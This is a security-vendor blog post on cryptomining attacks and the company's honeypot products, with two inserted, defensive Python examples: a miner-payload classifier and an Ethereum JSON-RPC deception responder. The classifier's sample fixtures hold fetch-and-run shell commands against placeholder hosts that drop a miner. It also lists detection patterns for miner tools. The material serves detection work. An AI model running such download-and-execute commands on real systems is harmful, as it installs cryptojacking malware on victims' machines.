Cryptocurrency Mining Hacks: How Thieves Steal Bitcoin and Ethereum

NewSky Security
Apr 24, 2018 · 6 min read

Over the last year, cryptocurrency broke into the mainstream with its dramatic highs and lows. With the ever-increasing buzz around cryptocurrency, a variety of attack methods for crypto theft have emerged, largely because it is much easier to move stolen funds anonymously than through conventional methods such as a fraudulent bank transfer, which can be quickly reverted or blocked and traced back to the attacker.

Attackers are not limiting themselves to a single approach: we observe attacks on mining hardware, mining software and wallets, as well as on the systems of ordinary owners who are candidates for a forced miner installation. To track each class of threat, NewSky Halo offers a bouquet of four CryptoIntelligence-gathering solutions, namely Albana, Barbera, Cortese and Durella.

Albana — Threat tracking via Halo CryptoMiner Holograms

One challenge that crypto mining machines share with IoT devices is a lack of standardization, which leads to a highly diverse set of architectures. Although building a honeypot by owning every known mining machine is possible, it is not viable because

(1). A large number of devices are already on the market.

(2). New mining machines are added to the market regularly.

In most cases a miner attacker will not have physical access to the victim’s device; all they can do is communicate with the mining machine remotely over the internet. Here miner deception comes to our rescue. If a deceptive model replies to the attacker’s requests in the same way as a physical machine, the attacker treats it as a real miner and launches attacks against it, which lets Halo gather threat intelligence.

With Halo’s modular miner deception platform, Albana, we have already emulated most of the known mining machines and keep adding new ones to the list. These mining machine holograms are exposed to the internet, so their IPs also show up on popular services like Shodan. Attackers often use brute forcing or crafted Shodan searches, a.k.a. “Shodan dorks”, to build a list of mining devices to attack. Our deception honeypots are pulled into such lists of potentially vulnerable mining machines. Consequently, if an attacker launches a targeted attack against a specific mining machine vendor, we receive those attacks in real time. The two images below show, on top, the validation window of a physical device and, below it, a Halo deception hologram of the same Antminer, which emulates the same validation window on the front end and the same port configuration and network behavior on the back end.

Antminer validation interface vs. Halo deception “Antminer” validation interface

Barbera — Trapping attacks on customized cryptomining based operating system/software

With an increasing number of people getting involved in cryptomining, mining with a usual setup such as Windows on a laptop may not be profitable. Hence many users are shifting to dedicated mining operating systems designed solely to optimize cryptomining. Such mining operating systems are often on attackers’ radar, since a successful compromise of one means instant crypto theft. One such popular operating system is ethOS, whose default SSH credentials were abused by attackers to take over users’ mining equipment.

With Halo’s customized protocol honeypot, Barbera, attacks on cryptomining operating systems are captured in real time, filtering out the noise of other SSH/telnet attacks aimed at non-crypto targets to produce a concentrated feed of attacks on cryptomining OSes. A global blacklist of all these cryptomining offenders’ IPs is maintained in Halo’s centralized database and can be queried per mining operating system.

Besides the intelligence gathered from mining operating systems, NewSky Security periodically audits mining OSes and releases advisories on the proper use of mining equipment. This information is made public so that people do not fall into mining traps, such as mining for someone else. We recently observed that several users were mining not for themselves but for a different user because of a configuration issue. We named it “StartWallet”.

Cortese — Tracking campaigns that deploy exploits to install crypto mining malware

An alternative to hacking mining equipment is to hack the systems of end users and install mining malware on them, so that they keep mining cryptocurrency while the system’s owner is unaware of it. To take control of these devices, attackers often resort to publicly available exploits, which are frequently cross-platform and hit a wide range of targets. Once an exploitation attempt succeeds, a miner is dropped. While Halo exploit honeypots capture a variety of Windows/Linux/IoT exploit attacks, our automated classifier, Cortese, identifies whether the end game of an exploit campaign is to install crypto mining malware. Halo’s centralized server stores this cryptojacking data, which can be queried by Halo’s users.

In the image below, we observed a Monero miner malware deployed by a CVE-2017-10271 campaign that was attacking a Halo exploit honeypot.

Similarly, we have been tracking the infamous DrupalGeddon2 (CVE-2018-7600) attacks from day one. In many cases, DrupalGeddon2 exploitation leads to a Monero miner payload.
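The classification step described above, as an added example in the spirit of Cortese rather than NewSky Halo’s own code: it scores a captured post-exploitation payload (the command line or dropper script a honeypot records after an exploit lands) on indicators that the end game is a miner drop. The indicator patterns, their weights, the flagging threshold, the sample payloads and the wallet string are all constructed for illustration; the Monero address shape (95 base58 characters starting with 4 or 8) and the stratum URL scheme are the real formats mining clients use.

```python
"""Classify captured post-exploitation payloads by whether their end game is
to drop a cryptominer. Added example in the spirit of the Cortese classifier;
not NewSky Halo's code. Indicator patterns, scores and sample payloads are
constructed for illustration."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Indicators of a miner drop (constructed list, not exhaustive):
#  - stratum pool URLs used by mining clients
#  - well-known miner binary names
#  - standard Monero public addresses: 95 base58 chars starting with 4 or 8
#  - pool-looking hostnames
#  - the typical miner CLI shape "-o <pool> ... -u <wallet>"
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://[\w.\-]+:\d{2,5}", re.I)
MINER_BIN_RE = re.compile(r"\b(?:xmrig|minerd|cpuminer|xmr-stak|ccminer)\b", re.I)
MONERO_ADDR_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
POOL_HOST_RE = re.compile(r"\b(?:pool|xmr|monero)[\w\-]*\.[a-z]{2,}\b", re.I)
MINER_FLAGS_RE = re.compile(r"\s-o\s+\S+.*?\s-u\s+\S+", re.S)  # case-sensitive: "-O" of wget must not hit

THRESHOLD = 3  # assumption: one strong indicator is enough to flag a payload


@dataclass
class Verdict:
    cryptojacking: bool
    score: int
    indicators: List[str] = field(default_factory=list)
    pools: List[str] = field(default_factory=list)
    wallets: List[str] = field(default_factory=list)


def classify_payload(payload: str) -> Verdict:
    """Score one captured payload (a command line or dropper script body)."""
    score, indicators = 0, []
    pools = STRATUM_RE.findall(payload)
    wallets = MONERO_ADDR_RE.findall(payload)
    checks = [
        ("stratum_url", bool(pools), 3),
        ("monero_address", bool(wallets), 3),
        ("miner_binary", bool(MINER_BIN_RE.search(payload)), 2),
        ("pool_hostname", bool(POOL_HOST_RE.search(payload)), 1),
        ("miner_cli_flags", bool(MINER_FLAGS_RE.search(payload)), 1),
    ]
    for name, hit, weight in checks:
        if hit:
            score += weight
            indicators.append(name)
    return Verdict(score >= THRESHOLD, score, indicators, pools, wallets)


def classify_campaigns(payloads: Dict[str, str]) -> Dict[str, Verdict]:
    """Classify every captured payload, keyed by honeypot event id."""
    return {name: classify_payload(p) for name, p in payloads.items()}


# Constructed wallet: has the shape of a Monero address but is not a real one
CONSTRUCTED_WALLET = "4A" + "B" * 93

# Constructed sample payloads, as a honeypot might record them after exploitation
SAMPLE_PAYLOADS = {
    "event-001": ("cd /tmp; wget -q http://dropper.invalid/m.sh -O m.sh; sh m.sh; "
                  "./xmrig -o stratum+tcp://xmr-pool.invalid:3333 -u "
                  + CONSTRUCTED_WALLET + " -p x -k"),
    "event-002": "uname -a; id; echo probe > /tmp/.probe",
    "event-003": "curl -s http://pool-update.invalid/x.sh | bash",
}

if __name__ == "__main__":
    for name, v in classify_campaigns(SAMPLE_PAYLOADS).items():
        print(f"{name}: cryptojacking={v.cryptojacking} score={v.score} "
              f"indicators={v.indicators} pools={v.pools}")
```

The weights are deliberately asymmetric: a stratum URL or a wallet address is near-conclusive on its own, while a pool-like hostname (event-003) only raises suspicion and is left below the threshold so that analysts can triage it rather than have it pollute the cryptojacking feed. Extracted pools and wallets are returned alongside the verdict because, as the page notes for the Halo feed, the attacker’s wallet address is itself the intelligence worth keeping.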

Durella — Crypto Wallet Deception

Some cryptocurrency attacks are not hardware- or vendor-specific, because the attacker’s end game is to gain direct access to a cryptocurrency wallet and transfer its coins into their own wallet. For example, Ethereum nodes expose a JSON-RPC interface for various operations; it is naturally meant to be used from localhost, i.e. by the owner of the system on which the node is installed.

However, if the system is exposed to the internet without proper firewalling or authentication, the JSON-RPC calls can be made from an external IP. An attacker can therefore scan the whole internet for Ethereum wallets with JSON-RPC exposed. For example, Halo honeypots often observe reconnaissance by attack IPs that send requests such as “eth_accounts” to check whether the IP is an exposed wallet they can break into.

The Halo deception honeypot, Durella, is designed to give positive responses to such recon queries. For example, if an attacker POSTs an eth_accounts request to Durella, Durella returns a valid Ethereum address, presenting itself as an exposed wallet. Encouraged by the positive response, attackers try further methods such as eth_sendTransaction, which also exposes the attackers’ own crypto address to Durella.
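The recon-then-transfer exchange described above, as an added example of a Durella-style responder rather than NewSky’s code: it answers Ethereum JSON-RPC requests the way an unlocked node would and records what each caller sends, so that the destination address in an eth_sendTransaction attempt is captured as intelligence. The decoy account, the decoy balance, the fake transaction hash, the sample requests and the source IP are constructed; the method names (eth_accounts, eth_getBalance, eth_sendTransaction), the JSON-RPC 2.0 error codes and port 8545 are the standard Ethereum RPC conventions.

```python
"""Ethereum JSON-RPC deception responder in the spirit of the Durella honeypot.
Added example, not NewSky's code. Decoy account, balance, fake tx hash and the
sample requests are constructed; method names and error codes are standard."""
import hashlib
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict, List, Optional, Tuple

DECOY_ACCOUNT = "0x" + "ab" * 20          # constructed 20-byte address, never funded
DECOY_BALANCE_WEI = 12 * 10**18           # constructed "12 ETH" bait balance
INTEL_LOG: List[Dict[str, Any]] = []      # everything callers tell the honeypot


def _result(req_id: Any, result: Any) -> Dict[str, Any]:
    return {"jsonrpc": "2.0", "id": req_id, "result": result}


def _error(req_id: Any, code: int, message: str) -> Dict[str, Any]:
    return {"jsonrpc": "2.0", "id": req_id, "error": {"code": code, "message": message}}


def _hex_to_int(value: Any) -> int:
    """Ethereum RPC encodes quantities as 0x-hex strings; treat anything else as 0."""
    try:
        return int(value, 16)
    except (TypeError, ValueError):
        return 0


def handle_rpc(raw_body: bytes, src_ip: str = "0.0.0.0") -> Tuple[Dict[str, Any], Optional[Dict[str, Any]]]:
    """Answer one JSON-RPC request like an unlocked node would and return
    (response, intel record). The intel record captures what the caller sent."""
    try:
        req = json.loads(raw_body)
    except ValueError:
        return _error(None, -32700, "Parse error"), None
    if not isinstance(req, dict) or "method" not in req:
        return _error(None, -32600, "Invalid Request"), None
    method, req_id = req["method"], req.get("id")
    params = req.get("params") or []
    intel: Dict[str, Any] = {"src": src_ip, "method": method}
    INTEL_LOG.append(intel)

    if method == "eth_accounts":
        # Recon probe: an unlocked node lists its accounts, so the decoy does too
        return _result(req_id, [DECOY_ACCOUNT]), intel
    if method == "eth_getBalance":
        # Make the decoy look worth stealing from
        return _result(req_id, hex(DECOY_BALANCE_WEI)), intel
    if method == "eth_sendTransaction" and params and isinstance(params[0], dict):
        tx = params[0]
        # The "to" field is where the caller wants the coins sent: their own wallet
        intel.update({"attacker_to": tx.get("to"), "value_wei": _hex_to_int(tx.get("value"))})
        # A plausible 32-byte tx hash keeps the caller believing the transfer went through
        fake_hash = "0x" + hashlib.sha256(raw_body).hexdigest()
        return _result(req_id, fake_hash), intel
    return _error(req_id, -32601, "Method not found"), intel


class DurellaStyleHandler(BaseHTTPRequestHandler):
    def do_POST(self) -> None:
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        resp, _ = handle_rpc(body, self.client_address[0])
        data = json.dumps(resp).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args: Any) -> None:  # intel goes to INTEL_LOG, not stderr
        pass


# Constructed sample exchange: recon probe, then the transfer attempt that leaks
# the caller's destination address (value 0x29a2241af62c0000 wei = 3 ETH)
SAMPLE_RECON = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_accounts", "params": []}).encode()
SAMPLE_TRANSFER = json.dumps({"jsonrpc": "2.0", "id": 2, "method": "eth_sendTransaction",
                              "params": [{"from": DECOY_ACCOUNT, "to": "0x" + "cd" * 20,
                                          "value": "0x29a2241af62c0000"}]}).encode()


def run_sample_exchange(src_ip: str = "198.51.100.7") -> List[Dict[str, Any]]:
    """Replay the constructed exchange and return the intel records it produced."""
    return [handle_rpc(body, src_ip)[1] for body in (SAMPLE_RECON, SAMPLE_TRANSFER)]


if __name__ == "__main__":
    for record in run_sample_exchange():
        print(record)
    HTTPServer(("127.0.0.1", 8545), DurellaStyleHandler).serve_forever()
```

Run stand-alone, the script prints the two intel records (the second one carrying the constructed `attacker_to` address and a `value_wei` of 3 ETH) and then listens on 127.0.0.1:8545; pointing any JSON-RPC client at it reproduces the exchange. The responder never holds a key and never touches a real chain: every answer is synthesized, and the only state it keeps is INTEL_LOG, which is what feeds the attacker-wallet list the conclusion refers to.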

Conclusion

While there are several honeypot methodologies in the wild, they capture a myriad of attacks, and it is difficult to find the needle (crypto threat attacks) in the haystack (all Windows, Linux and IoT attacks).

The Halo CryptoIntelligence bouquet (Albana, Barbera, Cortese and Durella) handles this challenge by creating a targeted feed of crypto threat attack IPs, the methods used to break into mining hardware/software/wallets, the wallet addresses of attackers, and the large-scale campaigns that employ mining malware.

Ankit Anubhav, Principal Researcher, NewSky Security
